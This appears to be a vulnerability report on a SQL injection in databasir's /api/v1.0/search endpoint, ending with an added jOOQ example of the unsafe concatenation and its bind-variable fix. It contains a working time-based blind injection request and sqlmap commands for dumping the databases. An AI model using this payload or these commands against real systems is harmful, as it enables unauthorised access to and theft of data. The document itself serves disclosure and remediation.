databasir
/api/v1.0/search?query= has a SQL Injection vulnerability
The vulnerable feature is located here in the UI:
The vulnerability originates in /api/v1.0/search: the query parameter is not filtered for malicious characters and is ultimately concatenated, unchanged, into the SQL at line 157 of DocumentFullTextDao.java. When the dslContext is built, the full string is spliced in and the complete SQL statement is executed:
Exploitation process: send a time-delay request so that the system is delayed by 5s:
GET /api/v1.0/search?query=')))+AND+(SELECT+2859+FROM+(SELECT(SLEEP(5)))HraM)%23 HTTP/1.1
Host: 127.0.0.1:9080
sec-ch-ua-platform: "Linux"
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJEYXRhYmFzaXIiLCJleHAiOjE3NjQ1ODA2ODUsInVzZXJuYW1lIjoiTi9BIn0.OHS6FZ10ym6iXDcXnxvzaH5_DU0FOa_Q7sHb06h9A3k
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/plain, */*
sec-ch-ua: "Chromium";v="139", "Not;A=Brand";v="99"
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
sec-ch-ua-mobile: ?0
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:9080/groups
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
After 5s the server returns 500.
The tool sqlmap can be used to speed up exploitation of the SQL injection: save the request above as reqsql.txt and run the following command
sqlmap -r reqsql.txt --level=5
Run the following blind injection to dump the databases; in the same way, blind-injection SQL expressions can be used to take full control of the database
sqlmap -r reqsql.txt --level=5 --dbs
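To illustrate the root cause described above and its fix, here is an added example (not the project's code): a hypothetical jOOQ DAO with the concatenation pattern beside a version that passes the query text as a bind value. The table and column names (document, title, content) are assumptions.

```java
import org.jooq.Condition;
import org.jooq.DSLContext;
import org.jooq.Record;
import org.jooq.Result;
import org.jooq.impl.DSL;

// Hypothetical DAO sketch, not the project's code. The "unsafe" method shows the
// concatenation pattern the report describes; the "safe" method shows the jOOQ
// bind-variable form that keeps user input out of the SQL grammar.
public class FullTextSearchExample {

    private final DSLContext ctx;

    public FullTextSearchExample(DSLContext ctx) {
        this.ctx = ctx;
    }

    // VULNERABLE: the request parameter becomes part of the SQL text, so a value
    // that closes the quote and parentheses (as in the report's payload) is
    // executed as SQL rather than treated as a search term.
    public Result<Record> searchUnsafe(String query) {
        String sql = "SELECT * FROM document "
                + "WHERE MATCH(title, content) AGAINST ('" + query + "')";
        return ctx.fetch(sql);
    }

    // HARDENED: '?' is a plain-SQL bind placeholder. jOOQ sends the value through
    // a PreparedStatement parameter, so quotes, parentheses and comment markers
    // in the input can never change the statement's structure.
    public Result<Record> searchSafe(String query) {
        Condition match = DSL.condition("MATCH(title, content) AGAINST (?)", query);
        return ctx.select()
                  .from(DSL.table("document"))
                  .where(match)
                  .fetch();
    }
}
```

With the bind-variable form, a time-based payload like the one in the report is simply matched as literal text and the request returns normally instead of sleeping and failing with 500.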